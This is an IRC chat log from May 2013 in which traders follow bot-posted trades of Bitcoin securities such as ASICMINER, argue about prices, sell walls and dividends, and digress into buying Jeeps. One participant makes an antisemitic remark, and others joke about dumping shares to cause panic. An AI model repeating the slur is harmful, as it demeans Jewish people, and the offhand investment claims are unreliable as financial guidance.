BTC [-] May 23 15:10:14 [BTCTC] [BITVPS] 1 @ 0.000651 BTC [-] May 23 15:10:16 [BTCTC] [BITVPS] 100 @ 0.00065 = 0.065 BTC [-] May 23 15:10:20 [BTCTC] [BITVPS] 8 @ 0.000621 = 0.005 BTC [-] May 23 15:10:21 [BTCTC] [BITVPS] 10 @ 0.000611 = 0.0061 BTC [-] May 23 15:10:23 [BTCTC] [BITVPS] 1 @ 0.00066 BTC [+] May 23 15:10:25 [BTCTC] [BITVPS] 100 @ 0.00061 = 0.061 BTC [-] May 23 15:10:26 [BTCTC] [BITVPS] 400 @ 0.0006 = 0.24 BTC [-] May 23 15:10:29 [BTCTC] [BITVPS] 309 @ 0.00057 = 0.1761 BTC [-] May 23 15:11:59 [BTCTC] [ASICMINER-PT] 3 @ 2.475 = 7.425 BTC [-] May 23 15:18:16 100TH jumped up this week, almost 40%. May 23 15:18:37 Actualy, more than 40% now that I look. May 23 15:19:06 [BTCTC] [TAT.ASICMINER] 4 @ 0.024999 = 0.1 BTC [+] May 23 15:20:21 Hm... If roughly ฿45 buys at market now, asks will be at 110% of what it was just a couple of days ago. May 23 15:20:39 I've looked into it, an I have not found anything that looks like a scam to me. May 23 15:20:46 ;;ticker May 23 15:20:47 BTCUSD ticker | Best bid: 125.14951, Best ask: 125.17218, Bid-ask spread: 0.02267, Last trade: 125.14951, 24 hour volume: 18107.00424126, 24 hour low: 122.20000, 24 hour high: 125.17219, 24 hour vwap: 123.83697 May 23 15:21:02 [HAVELOCK] [ASICM] 30 @ 0.025299 = 0.759 BTC [+] May 23 15:21:14 nice! May 23 15:21:26 TAT.AM PT will hit 2000 today May 23 15:21:28 We'll see in a couple of days or a week whether Bitfury delivers. If he does, I think this one may have merit. May 23 15:21:29 [BTCTC] [RSM] 16 @ 0.009789 = 0.1566 BTC [+] May 23 15:21:54 everywhere May 23 15:21:55 hehe May 23 15:22:03 [HAVELOCK] [ASICM] 200 @ 0.0253 = 5.06 BTC [+] May 23 15:22:09 It's all over BNBN, haven't you hear? May 23 15:22:13 *BNN May 23 15:22:13 BTCTC/BF/Havelock May 23 15:22:15 [BTCTC] [RSM] 1 @ 0.00979 BTC [+] May 23 15:22:16 [BTCTC] [RSM] 36 @ 0.009938 = 0.3578 BTC [+] May 23 15:22:41 Haha :-) May 23 15:22:45 srsly? May 23 15:22:52 some asicminer pass through May 23 15:23:03 [HAVELOCK] [ASICM] 200 @ 0.025299 = 5.0598 BTC [-] May 23 15:23:08 [08:19] <@assbot> [BTCTC] [TAT.ASICMINER] 4 @ 0.024999 = 0.1 BTC [+] May 23 15:23:12 [08:23] <@assbot> [HAVELOCK] [ASICM] 200 @ 0.025299 = 5.0598 BTC [-] May 23 15:23:17 [08:14] <+AssetBot> [TAT.ASICMINER] 1 @ 0.02511990 = 0.02511990 [+] May 23 15:23:20 hehe May 23 15:23:35 no worries May 23 15:23:40 its a 100PT May 23 15:24:37 I have a cool idea for a bond I might do May 23 15:24:49 just not sure if I need to May 23 15:25:10 Care to elaborate? May 23 15:25:13 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] May 23 15:25:15 [BTCTC] [ASICMINER-PT] 1 @ 2.458 BTC [-] May 23 15:25:16 [BTCTC] [ASICMINER-PT] 4 @ 2.45 = 9.8 BTC [-] May 23 15:25:18 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] May 23 15:25:21 [BTCTC] [ASICMINER-PT] 1 @ 2.422 BTC [-] May 23 15:25:22 [BTCTC] [ASICMINER-PT] 4 @ 2.4212 = 9.6848 BTC [-] May 23 15:25:24 [BTCTC] [ASICMINER-PT] 10 @ 2.42 = 24.2 BTC [-] May 23 15:25:35 The way of the exploding dodo... May 23 15:26:02 [HAVELOCK] [ASICM] 2 @ 0.0253 = 0.0506 BTC [+] May 23 15:26:03 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] May 23 15:26:18 [BTCTC] [TAT.ASICMINER] 13 @ 0.024635 = 0.3203 BTC [-] May 23 15:26:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.02451 = 0.2451 BTC [-] May 23 15:26:21 [BTCTC] [TAT.ASICMINER] 64 @ 0.0245 = 1.568 BTC [-] May 23 15:27:19 5% of current user base at Picostocks registered in past 24 hours. Wonder what they're buying... May 23 15:27:38 100th? May 23 15:27:51 Chaang-Noi: dont buy wrangler > 2003 May 23 15:28:02 if you get a wrangler get the TJ May 23 15:28:09 new ones are unreliable as fuck May 23 15:28:23 platform May 23 15:29:12 I had a Willys (new edition) May 23 15:29:17 with army star on it May 23 15:29:28 not because i am military May 23 15:29:33 My wife wants me to buy a wrangler for her and I'm leaning towards it. May 23 15:29:48 Chaang-Noi: its jeep specific May 23 15:29:49 just cuz it had way more features and was less expensive than the X May 23 15:29:59 TJ was the platform built between 1996 and 2006 i believe May 23 15:30:15 if you want a new car, dont buy jeep May 23 15:30:51 lmfao May 23 15:31:14 $43k is way too much for a jeep May 23 15:31:26 get yourself an audi or a new cadillac May 23 15:31:28 jeeps dont have a wide enough wheel base imo May 23 15:31:34 fiat500: fuck the new cadillac May 23 15:31:38 old or bust May 23 15:31:42 the ATS is hot May 23 15:32:17 Diablo-D3: jeeps have a square wheel base, which I love. no fish tailing. May 23 15:32:24 Chaang-Noi: dont just buy anything u can find for btc lol May 23 15:32:30 deadweasel: yeah but it could be wider. May 23 15:32:55 that's a niche for hummers May 23 15:33:31 they dont make original H1s anymore May 23 15:33:35 the new ones are fucking shit May 23 15:34:25 Chaang-Noi: i just sold my $60k car and planning on buying a $3k jeep from 2000/2001 May 23 15:34:49 in terms of investments, cars are fucking terrible May 23 15:35:00 i lost $30k in depreciation alone May 23 15:35:24 get an older jeep if u want fun May 23 15:36:22 [BTCTC] [ASICMINER-PT] 1 @ 2.417011 BTC [-] May 23 15:36:31 well, you will spend more on the new one, and the engine will fail promptly May 23 15:36:46 if thats your idea of fun, go for it May 23 15:36:56 [BTCTC] [S.DICE-PT] 1 @ 0.00267 BTC [-] May 23 15:36:58 man May 23 15:37:01 if I buy a car May 23 15:37:02 its going to be a model s May 23 15:37:07 lol May 23 15:37:09 [BTCTC] [TAT.ASICMINER] 12 @ 0.024998 = 0.3 BTC [+] May 23 15:37:12 fuck gas, fuck diesel, fuck your out of date notions May 23 15:37:19 I want a car that will be legal to drive in 10 years May 23 15:37:36 [BTCTC] [PAJKA.BOND] 1 @ 0.108 BTC [+] May 23 15:37:57 http://www.forbes.com/sites/jimgorzelany/2012/11/28/new-cars-to-avoid/ May 23 15:38:48 http://content.usatoday.com/communities/driveon/post/2012/08/chrysler-to-fix-defect-in-1000-v-6-engines-/1#.UZ4NwWSnxzo May 23 15:39:08 plus tons of anecdotal evidence from people driving out of the dealership only to have the CEL show up May 23 15:39:32 http://jalopnik.com/5697449/why-did-a-new-jeep-wrangler-die-in-ten-inches-of-water May 23 15:39:37 check engine light May 23 15:40:04 the new ones are simply worse than the old ones, which is very sad May 23 15:40:22 lots of new technology in the new models, but terrible quality control May 23 15:42:22 well May 23 15:42:24 they're not american May 23 15:42:25 thats why May 23 15:42:39 the only cars worth driving are made in america or cost in excess of $100k. May 23 15:42:41 [MPEX] [S.DICE] 1000 @ 0.0023742 = 2.3742 BTC [-] May 23 15:42:43 [MPEX] [S.DICE] 5000 @ 0.0023743 = 11.8715 BTC [+] May 23 15:42:53 [MPEX] [S.DICE] 3000 @ 0.00237436 = 7.1231 BTC [+] May 23 15:43:00 Chaang-Noi: i spent a good 2 months researching this May 23 15:43:02 Chaang-Noi: get a Hilux May 23 15:43:09 because i really want an offroader now, tired of sports cars May 23 15:43:10 [MPEX] [S.DICE] 648 @ 0.00275 = 1.782 BTC [+] May 23 15:43:21 hilux is a beast May 23 15:43:29 [BTCTC] [TAT.ASICMINER] 12 @ 0.0245 = 0.294 BTC [-] May 23 15:43:29 then you're all set ;) May 23 15:43:30 [BTCTC] [TAT.ASICMINER] 39 @ 0.0245 = 0.9555 BTC [-] May 23 15:43:41 Chaang-Noi: why not raptor May 23 15:43:42 lol May 23 15:44:03 [HAVELOCK] [ASICM] 19 @ 0.0253 = 0.4807 BTC [+] May 23 15:44:55 ah, nice May 23 15:45:36 raptor? LOL May 23 15:45:45 its /the/ offroad truck May 23 15:46:15 honestly i wouldnt think twice if i wasnt moving to the city May 23 15:46:26 hard to park that thing May 23 15:46:57 http://www.ford.com/trucks/f150/trim/raptor/ May 23 15:47:04 around the same price as the jeep you were considering May 23 15:49:02 [HAVELOCK] [ASICM] 19 @ 0.0253 = 0.4807 BTC [+] May 23 15:49:03 [HAVELOCK] [ASICM] 80 @ 0.0253 = 2.024 BTC [+] May 23 15:49:20 [BTCTC] [ASICMINER-PT] 1 @ 2.457999 BTC [+] May 23 15:49:23 im done buying new cars for the time being, so much heartache when it gets scratched/dinged May 23 15:49:39 heartache and wallet-ache May 23 15:54:55 [MPEX] [S.MPOE] 11600 @ 0.00069379 = 8.048 BTC [-] May 23 15:57:29 [BTCTC] [B.YABMC] 6 @ 0.01673 = 0.1004 BTC [+] May 23 15:58:08 [BTCTC] [TAT.ASICMINER] 4 @ 0.024998 = 0.1 BTC [+] May 23 16:00:18 [BTCTC] [ASICMINER-PT] 1 @ 2.417011 BTC [-] May 23 16:01:02 [HAVELOCK] [ASICM] 4 @ 0.0253 = 0.1012 BTC [+] May 23 16:02:32 bill maher mentioned bitcoin recently May 23 16:02:37 in passing, on his show May 23 16:03:21 http://money.cnn.com/2013/05/23/technology/enterprise/bitcoin-supercomputers/index.html?iid=HP_LN May 23 16:04:01 [MPEX] [S.MPOE] 593 @ 0.00069788 = 0.4138 BTC [+] May 23 16:04:53 first comment on that article: "Please stop! bitcoin is a scam and more worthless than gambling on the price of tulip bulbs. The future is energy backed currency." May 23 16:05:14 [BTCTC] [TAT.ASICMINER] 9 @ 0.0248 = 0.2232 BTC [-] May 23 16:05:26 all the comments hate it May 23 16:05:28 hehe May 23 16:05:59 [BTCTC] [TAT.ASICMINER] 136 @ 0.0248 = 3.3728 BTC [-] May 23 16:06:15 "What an utter waste of electricity... for what? To generate 21 million pseudo-random numbers that only people believe in religiously who are looking for the Jesus of currencies." May 23 16:06:32 [BTCTC] [ASICMINER-PT] 1 @ 2.41701 BTC [-] May 23 16:08:39 [BTCTC] [ASICMINER-PT] 1 @ 2.413 BTC [-] May 23 16:09:06 [BTCTC] [ASICMINER-PT] 1 @ 2.410003 BTC [-] May 23 16:09:45 [BTCTC] [TAT.ASICMINER] 20 @ 0.024418 = 0.4884 BTC [-] May 23 16:10:00 [BTCTC] [ASICMINER-PT] 1 @ 2.410003 BTC [-] May 23 16:10:03 [HAVELOCK] [ASICM] 50 @ 0.0248 = 1.24 BTC [-] May 23 16:11:39 [BTCTC] [ASICMINER-PT] 1 @ 2.371003 BTC [-] May 23 16:12:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.024417 = 0.0977 BTC [-] May 23 16:12:11 [BTCTC] [ASICMINER-PT] 1 @ 2.371002 BTC [-] May 23 16:12:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.0244 = 0.0976 BTC [-] May 23 16:13:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.02436 BTC [-] May 23 16:13:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.02431 BTC [-] May 23 16:13:35 [BTCTC] [S.MPOE-PT] 139 @ 0.000699 = 0.0972 BTC [+] May 23 16:13:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0243 BTC [-] May 23 16:13:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.0243 BTC [-] May 23 16:14:02 [HAVELOCK] [ASICM] 46 @ 0.0248 = 1.1408 BTC [-] May 23 16:14:04 [HAVELOCK] [ASICM] 96 @ 0.0248 = 2.3808 BTC [-] May 23 16:14:19 [BTCTC] [TAT.ASICMINER] 27 @ 0.024201 = 0.6534 BTC [-] May 23 16:14:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.024201 = 0.0726 BTC [-] May 23 16:14:31 [BTCTC] [ASICMINER-PT] 1 @ 2.38 BTC [+] May 23 16:14:36 [BTCTC] [ASICMINER-PT] 4 @ 2.3715 = 9.486 BTC [-] May 23 16:14:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.0241 = 0.0723 BTC [-] May 23 16:14:47 [BTCTC] [TAT.ASICMINER] 14 @ 0.024 = 0.336 BTC [-] May 23 16:14:53 [BTCTC] [TAT.ASICMINER] 20 @ 0.024 = 0.48 BTC [-] May 23 16:14:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.024 = 0.048 BTC [-] May 23 16:15:03 [BTCTC] [TAT.ASICMINER] 4 @ 0.0239 = 0.0956 BTC [-] May 23 16:15:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.0238 = 0.0714 BTC [-] May 23 16:15:07 [BTCTC] [TAT.ASICMINER] 30 @ 0.0238 = 0.714 BTC [-] May 23 16:15:22 [BTCTC] [ASICMINER-PT] 1 @ 2.3716 BTC [+] May 23 16:15:55 [BTCTC] [TAT.ASICMINER] 22 @ 0.02379 = 0.5234 BTC [-] May 23 16:15:58 [BTCTC] [ASICMINER-PT] 1 @ 2.3715 BTC [-] May 23 16:16:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.02379 = 0.0476 BTC [-] May 23 16:16:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.02379 = 0.0714 BTC [-] May 23 16:16:27 [BTCTC] [ASICMINER-PT] 10 @ 2.371001 = 23.71 BTC [-] May 23 16:16:31 [BTCTC] [ASICMINER-PT] 3 @ 2.371001 = 7.113 BTC [-] May 23 16:17:02 [HAVELOCK] [ASICM] 96 @ 0.0253 = 2.4288 BTC [+] May 23 16:17:11 [BTCTC] [TAT.ASICMINER] 15 @ 0.02376 = 0.3564 BTC [-] May 23 16:17:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.02376 = 0.0713 BTC [-] May 23 16:18:02 [HAVELOCK] [ASICM] 80 @ 0.02545 = 2.036 BTC [+] May 23 16:18:39 [BTCTC] [ASICMINER-PT] 1 @ 2.4378 BTC [+] May 23 16:19:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [+] May 23 16:19:55 [BTCTC] [S.MPOE-PT] 1000 @ 0.0007 = 0.7 BTC [+] May 23 16:20:02 [HAVELOCK] [ASICM] 200 @ 0.0255 = 5.1 BTC [+] May 23 16:21:52 [BTCTC] [ASICMINER-PT] 1 @ 2.343 BTC [-] May 23 16:23:02 [HAVELOCK] [HIM] 1 @ 2.25 BTC [+] May 23 16:24:47 [BTCTC] [TAT.ASICMINER] 9 @ 0.02479 = 0.2231 BTC [-] May 23 16:25:47 [BTCTC] [TAT.ASICMINER] 12 @ 0.024799 = 0.2976 BTC [+] May 23 16:29:02 [HAVELOCK] [SDICE] 1 @ 0.2321 BTC [+] May 23 16:30:02 [HAVELOCK] [ASICM] 4 @ 0.0255 = 0.102 BTC [+] May 23 16:31:02 [HAVELOCK] [SDICE] 3 @ 0.232 = 0.696 BTC [-] May 23 16:31:33 [BTCTC] [S.MPOE-PT] 250 @ 0.0007 = 0.175 BTC [+] May 23 16:32:27 [BTCTC] [ASICMINER-PT] 1 @ 2.42 BTC [+] May 23 16:34:02 [HAVELOCK] [ASICM] 200 @ 0.025 = 5 BTC [-] May 23 16:44:03 [HAVELOCK] [ASICM] 117 @ 0.0253 = 2.9601 BTC [+] May 23 16:45:02 [HAVELOCK] [ASICM] 100 @ 0.0254 = 2.54 BTC [+] May 23 16:46:28 [BTCTC] [S.DICE-PT] 4 @ 0.002645 = 0.0106 BTC [-] May 23 16:49:02 [HAVELOCK] [ASICM] 15 @ 0.02541 = 0.3812 BTC [+] May 23 16:50:02 [HAVELOCK] [ASICM] 102 @ 0.02545 = 2.5959 BTC [+] May 23 16:50:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.0242 = 0.121 BTC [-] May 23 16:52:52 [BTCTC] [TAT.ASICMINER] 8 @ 0.024101 = 0.1928 BTC [-] May 23 16:53:02 [HAVELOCK] [ASICM] 32 @ 0.02549 = 0.8157 BTC [+] May 23 16:53:34 [MPEX] [S.BBET] 5000 @ 0.00159979 = 7.999 BTC [-] May 23 16:53:52 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [-] May 23 16:54:04 [BTCTC] [TAT.ASICMINER] 6 @ 0.0241 = 0.1446 BTC [-] May 23 17:02:02 [BTCTC] [ASICMINER-PT] 1 @ 2.3732 BTC [-] May 23 17:02:04 [BTCTC] [ASICMINER-PT] 1 @ 2.3732 BTC [-] May 23 17:03:02 [HAVELOCK] [ASICM] 17 @ 0.02525 = 0.4293 BTC [-] May 23 17:06:07 so, uh May 23 17:06:14 wouldnt that make bitcoin the theorized jewmoney? May 23 17:06:50 [BTCTC] [ASICMINER-PT] 1 @ 2.3733 BTC [+] May 23 17:06:52 [BTCTC] [ASICMINER-PT] 1 @ 2.3732 BTC [-] May 23 17:07:01 [BTCTC] [ASICMINER-PT] 1 @ 2.3732 BTC [-] May 23 17:07:45 [BTCTC] [ASICMINER-PT] 1 @ 2.3732 BTC [-] May 23 17:08:12 [BTCTC] [ASICMINER-PT] 1 @ 2.3732 BTC [-] May 23 17:08:17 [BTCTC] [ASICMINER-PT] 1 @ 2.373 BTC [-] May 23 17:08:24 [BTCTC] [ASICMINER-PT] 2 @ 2.373 = 4.746 BTC [-] May 23 17:08:28 [BTCTC] [ASICMINER-PT] 4 @ 2.36512 = 9.4605 BTC [-] May 23 17:08:29 [BTCTC] [TAT.ASICMINER] 5 @ 0.024797 = 0.124 BTC [+] May 23 17:08:39 [BTCTC] [TAT.ASICMINER] 16 @ 0.024101 = 0.3856 BTC [-] May 23 17:08:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.0241 BTC [-] May 23 17:08:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.0241 = 0.1205 BTC [-] May 23 17:09:03 who dumped May 23 17:09:04 >_> May 23 17:09:16 shh May 23 17:09:25 omg AM tanking baaaaaaaail May 23 17:09:49 `:) May 23 17:10:43 LOL May 23 17:10:49 this is what happens when people are bad at selling May 23 17:11:49 all my shit is in the red May 23 17:11:56 [BTCTC] [TAT.ASICMINER] 8 @ 0.02475 = 0.198 BTC [+] May 23 17:12:27 [BTCTC] [ASICMINER-PT] 1 @ 2.36512 BTC [-] May 23 17:12:47 [BTCTC] [ASICMINER-PT] 7 @ 2.365 = 16.555 BTC [-] May 23 17:12:49 [BTCTC] [ASICMINER-PT] 2 @ 2.365 = 4.73 BTC [-] May 23 17:13:03 [HAVELOCK] [ASICM] 1 @ 0.02525 BTC [-] May 23 17:13:22 great wall of thailand May 23 17:13:55 Selling down 40 shares coesn't really require extensive skill... What is sad, though, is that someone bought TAT.AM on BTCT for the equivalent of ฿3.33. May 23 17:14:18 0.035? May 23 17:14:22 seriously? May 23 17:14:24 furuknap May 23 17:14:29 its not selling 40 shares May 23 17:14:31 Yes, dear? May 23 17:14:33 that i'm talking about May 23 17:14:41 its jutarul and DT May 23 17:14:45 [BTCTC] [TAT.ASICMINER] 7 @ 0.02475 = 0.1733 BTC [+] May 23 17:15:07 furuknap: huh, you're right May 23 17:15:13 small quantities tho May 23 17:15:16 somehow they think that posting 500-share walls will get them the price they want May 23 17:15:38 You mean the 500 wall that has been going down from 2.6 to 2.45 over the previous 12 hours? May 23 17:15:42 yep May 23 17:15:49 chasing the dream May 23 17:16:06 lol May 23 17:16:33 Not unless scaring people is what you want. May 23 17:16:35 Dt was selling his privately at 2.5 May 23 17:16:40 and I was gobbling them up May 23 17:16:47 but then he posted these walls May 23 17:16:57 and asked me for 2.425 May 23 17:17:25 he offered them for 2.4 May 23 17:17:32 i said id give him 1.9 May 23 17:17:36 havent heard from him since May 23 17:17:38 :P May 23 17:17:44 Last night, that 500 wall could have been sold for just over ฿1100 and would have brought the price down to 0.002, which would almost have been worth it just to watch the panic :-) May 23 17:17:52 so the BF AM PT is cloing down? May 23 17:17:55 LOL May 23 17:18:02 no BitHub May 23 17:18:08 DT is closing out an older fund May 23 17:18:14 that owned a lot of AM shares May 23 17:18:43 i'm glad he tried to raise the price May 23 17:18:48 (DT) May 23 17:18:57 it allowed me to buy cheaper elsewhere May 23 17:19:18 if DT and Jutarul want fair value May 23 17:19:23 they can always pm me May 23 17:19:57 Yeah, but dump 100 shares on BTCT now, and AM trades at 2.1. Another 100 and we're down to 1.85. Buy the same and we're up to 2.45, still lower than this morning. May 23 17:20:02 [HAVELOCK] [ASICM] 3 @ 0.02525 = 0.0758 BTC [-] May 23 17:20:44 Before or after dividends? ;-) May 23 17:21:29 I mean, most of the people that have been rushing the AM price these last couple of weeks have no idea how to value anything. They'll see a 43% drop in dividends and freak out, realizing the beanstalk doesn't grow into the heavens. May 23 17:21:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.0245 = 0.049 BTC [-] May 23 17:22:00 Tell that to the noobs :-) May 23 17:22:21 They'll still wait, like they waited until the 50% dividend happened. May 23 17:23:02 lul May 23 17:23:26 lol May 23 17:23:29 sorry Chaaang-Noi May 23 17:23:52 Then, when someone starts telling them that next week's huge dividend is the result of one full month of pushing USB miners and that dividends will go down again in two weeks, they'll still wait. May 23 17:24:02 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] May 23 17:24:03 [HAVELOCK] [ASICM] 175 @ 0.02475 = 4.3313 BTC [-] May 23 17:24:18 Indeed. May 23 17:24:53 [BTCTC] [ASICMINER-PT] 1 @ 2.397999 BTC [+] May 23 17:24:55 [BTCTC] [ASICMINER-PT] 1 @ 2.398 BTC [+] May 23 17:25:02 [HAVELOCK] [ASICM] 2 @ 0.02525 = 0.0505 BTC [+] May 23 17:25:18 [MPEX] [S.MPOE] 4874 @ 0.00070442 = 3.4333 BTC [+] May 23 17:25:21 [BTCTC] [ASICMINER-PT] 1 @ 2.399 BTC [+] May 23 17:25:23 [BTCTC] [ASICMINER-PT] 1 @ 2.399998 BTC [+] May 23 17:25:29 Because long-term, people need reliable markets and to not burn themselves on bubbles. In the long term, that helps me. I'm selfish that way. May 23 17:25:45 [BTCTC] [ASICMINER-PT] 2 @ 2.4 = 4.8 BTC [+] May 23 17:26:28 i bought 10btc via coinbase, went surprisingly well May 23 17:26:49 We're 200 shares away from that, Chaang. We're 600 shares away from 2.5. May 23 17:27:02 [HAVELOCK] [ASICM] 100 @ 0.0245 = 2.45 BTC [-] May 23 17:27:23 furuknap: 200 shares from what? May 23 17:27:38 Fiat: From falling below ฿2 again. May 23 17:27:39 2.0? May 23 17:27:41 this is just the market trying to figure out what to do about lower divs and a big fucking walls May 23 17:27:54 also some people cashing out cuz: May 23 17:27:56 ;;ticker May 23 17:27:57 BTCUSD ticker | Best bid: 125.37275, Best ask: 125.39677, Bid-ask spread: 0.02402, Last trade: 125.39678, 24 hour volume: 21941.09404989, 24 hour low: 122.20000, 24 hour high: 126.92200, 24 hour vwap: 124.35825 May 23 17:28:01 bidside is incredibly thin May 23 17:28:06 always is May 23 17:28:29 if someone were to execute an in the money call on mpex exchange. what happens next? how do dollars get into mpex to make the buy? I know it's a dumb question, and probably offensively dumb, but I can't find instructions anywhere for this May 23 17:28:32 because it's been overbought May 23 17:28:43 Sure, but there has also been 3000 shares moved to BTCT recently. No idea what other markets get, but that's a lot of selling power, and I can't imagine any other reason why people would move shares into a PT if not because they want to sell. May 23 17:29:04 I have a bunch too May 23 17:29:06 yeah 2.4-3 is good profit taking May 23 17:29:11 2.7* May 23 17:29:54 [BTCTC] [BASIC-MINING] 18 @ 0.56 = 10.08 BTC [+] May 23 17:30:01 COG.F sold out last night, btw. May 23 17:30:08 furuknap: yay May 23 17:30:22 that kid better do something with my money May 23 17:30:25 [BTCTC] [GSDPT] 5 @ 0.0028 = 0.014 BTC [-] May 23 17:30:27 [BTCTC] [GSDPT] 31 @ 0.0028 = 0.0868 BTC [-] May 23 17:30:32 Get in line, I was there first :-) May 23 17:30:36 haha May 23 17:30:45 [BTCTC] [ASICMINER-PT] 1 @ 2.39 BTC [-] May 23 17:30:47 Chaaang-Noi: is he going to buy anything or what May 23 17:30:59 Yeah, in two weeks. May 23 17:31:09 in 2 weeks they will /order/ May 23 17:31:15 lol. May 23 17:31:48 Chaaang-Noi: i have more than half as many GH/s on order than all of cognitive May 23 17:31:50 [BTCTC] [GSDPT] 69 @ 0.0028 = 0.1932 BTC [-] May 23 17:32:09 he needs to step up his game a bit :P May 23 17:32:27 Chaaang-Noi: at this point, they only have orders May 23 17:32:40 so the comparison is valid May 23 17:32:40 Saw this on reddit earlier today: http://www.reddit.com/r/Bitcoin/comments/1ew9mt/is_100th_next_asicminer_jumps_40_in_a_week_up_500/ <- May explain all the new accounts on Pico... May 23 17:33:06 [BTCTC] [ASICMINER-PT] 1 @ 2.4378 BTC [+] May 23 17:34:17 [BTCTC] [GSDPT] 60 @ 0.00258 = 0.1548 BTC [-] May 23 17:34:58 [BTCTC] [GSDPT] 44 @ 0.00258 = 0.1135 BTC [-] May 23 17:35:23 chips not tested yet May 23 17:35:31 Wafer not done yet. May 23 17:35:44 they havent even produced a working chip, and price is already up to 0.25? May 23 17:36:26 packaging start tomorro. May 23 17:36:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.02449 = 0.2449 BTC [-] May 23 17:36:52 Well, the price, if they do get a working chip (and bitfury sounds confident) then the entire upside of fulfilling that promise is yet to be realized, like I wrote in that reddit-comment. May 23 17:37:08 [HAVELOCK] [ASICM] 12 @ 0.0246 = 0.2952 BTC [+] May 23 17:37:09 [HAVELOCK] [ASICM] 46 @ 0.0246 = 1.1316 BTC [+] May 23 17:37:10 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [+] May 23 17:37:15 Unofficial BFL News ‏@BFL_News 2h May 23 17:37:15 We are expecting several thousand chips next week from our new packaging facility and expect to start shipping all product lines next week. May 23 17:37:39 mmhmmmm May 23 17:37:54 Next week (tm) May 23 17:38:12 Trying to get both Two weeks and Next week as trademarks. May 23 17:38:25 I , personally , expect this to be accurate May 23 17:38:53 Jala are working flawless May 23 17:39:12 I, personally, have heard this before. Yeah, _this_ time it may be right, but so could all the other times have been. May 23 17:39:15 oh gawd AM is tanking, help May 23 17:39:15 so from chips in the door to finished miners out the door in a matter of days... May 23 17:39:25 People please learn May 23 17:39:27 lol BitHub May 23 17:39:35 its 266 all over again May 23 17:39:45 Either you invest! in which case the price of the market doesn't matter as you believe in the underlieing company and that it will suceed. May 23 17:40:00 Or you are speculating, in which case you have no ground to be bitching as it is the same as gambling. May 23 17:40:10 So either sit in the boat and wait for long term. Or stop bitching May 23 17:40:30 help its tanking May 23 17:40:34 hahahaha May 23 17:40:38 halp! halp! May 23 17:40:45 !!!! May 23 17:40:53 DT: I agree, but the difference is that I invest, expecting a certain return over a certain period. When the profit I can make from selling far exceeds the profit I can make from investing, then selling just makes sense. May 23 17:41:02 [HAVELOCK] [ASICM] 15 @ 0.02425 = 0.3638 BTC [-] May 23 17:41:03 [HAVELOCK] [ASICM] 9 @ 0.02412 = 0.2171 BTC [-] May 23 17:41:05 [HAVELOCK] [ASICM] 17 @ 0.02411 = 0.4099 BTC [-] May 23 17:41:06 [HAVELOCK] [ASICM] 32 @ 0.024101 = 0.7712 BTC [-] May 23 17:41:07 Of course! May 23 17:41:07 [HAVELOCK] [ASICM] 100 @ 0.024 = 2.4 BTC [-] May 23 17:41:11 There is such a thing as overpriced May 23 17:41:22 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] May 23 17:41:32 what May 23 17:41:51 I am just a bit annoyed that people hype thing up May 23 17:41:58 and then bitch when teh bubble bursts May 23 17:42:02 ^ how did that happen May 23 17:42:25 oh, option? May 23 17:42:27 ;;later tell fontas - emergency conference meeting 10mins May 23 17:42:28 The operation succeeded. May 23 17:43:02 https://btct.co/security/ASICMINER-PT#tab3 <- Option indeed May 23 17:43:25 I loaded off 2.6k on the market within 2 days I guess that it couldn't handle it and started to give away. I always posted asks so I did not stand for the selling into bids, that was the people who lost faith and paniced. May 23 17:43:32 [BTCTC] [ASICMINER-PT] 1 @ 2.4213 BTC [+] May 23 17:44:03 furuknap: ok phew :P May 23 17:44:08 The good news is that this may bring the price to a more reasonable level, panic and burns aside. May 23 17:45:58 DT, is that 500 wall yours? May 23 17:46:16 Yes May 23 17:46:36 You are more then welcomed to buy into it May 23 17:46:39 could you move down to 2.4 plz? May 23 17:46:44 Yesterday, I would _almost_ have covered your losses, just to see you sell it into the market and watch the panic :-) May 23 17:47:07 DeaDTerra: if you sell into the bids as it's rising, that keeps it down, fyi. if it's already too late and it's skyrocketed, then i understand eating into bids would cause panic May 23 17:47:43 either way i think it's definitely a good idea for you big guys to sell when it starts going parabolically stupid May 23 17:48:02 [HAVELOCK] [ASICM] 5 @ 0.0248 = 0.124 BTC [+] May 23 17:48:03 [HAVELOCK] [ASICM] 10 @ 0.0248 = 0.248 BTC [+] May 23 17:48:07 [BTCTC] [ASICMINER-PT] 1 @ 2.4376 BTC [+] May 23 17:48:18 just dump 500 shares right now into the bids to bring back some sanity May 23 17:48:19 [BTCTC] [ASICMINER-PT] 1 @ 2.4377 BTC [+] May 23 17:48:33 [16:47] ... it's definitely a good idea for you big guys to sell when it starts going stupid < FTFY May 23 17:48:56 agree May 23 17:49:05 cole_albon: all options are settled in BTC, so no dollars on MPEx May 23 17:49:40 argh. why can't people code? May 23 17:49:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.0242 = 0.0968 BTC [-] May 23 17:49:47 [BTCTC] [TAT.ASICMINER] 8 @ 0.0241 = 0.1928 BTC [-] May 23 17:50:08 qxzn: May 23 17:50:11 ok im done May 23 17:50:20 [BTCTC] [ASICMINER-PT] 1 @ 2.400101 BTC [-] May 23 17:50:26 